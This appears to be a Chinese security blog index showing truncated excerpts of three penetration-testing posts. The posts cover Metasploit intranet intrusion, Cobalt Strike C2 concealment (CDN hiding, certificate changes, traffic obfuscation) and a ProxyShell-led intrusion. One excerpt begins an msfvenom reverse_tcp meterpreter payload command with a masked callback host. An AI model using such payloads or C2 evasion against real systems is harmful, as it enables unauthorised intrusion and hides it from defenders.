打瞌睡的状况下写的无质量msf内网
本来还是想用cobalt strike,但是由于某些原因,暂时关闭了cobalt strike的服务器,正好用msf尝试做一次内网渗透熟悉熟悉,注:最初用蚁剑看了一下,此次目标主机没开杀软,所以以下内容不涉及免杀.一、MSF生成木马上线目标0x01. 生成木马使用命令: msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=XXX.XXX.X
内网神器Cobalt Strike隐藏特征与流量混淆.
由于上次还没有写好https上线的东西,今天加班加点的弄出来了。本文内容如有错误,望及时告知,以免误导他人.Cobalt Strike 特征隐藏与流量混淆大致内容:修改默认端口服务器设置禁PingCobalt Strike默认证书修改CDN隐藏利用C2流量混淆Cobalt Strike服务端配置0x01. 需求配置vps一台域名CDNCobalt Strike4.00x02.
记一次由ProxyShell漏洞引发的无质量内网渗透
一、 Exchange中的ProxyShell漏洞ProxyShell是Exchange的最新漏洞,CVE编号为CVE-2021-34473(远程代码执行)、CVE-2021-34523(特权提升)、CVE-2021-31207(安全绕过漏洞),有兴趣的师傅可以自行去google、twitter等找找相关文档。放上之前看到的复现链接:https://peterjson.medium.com/r
1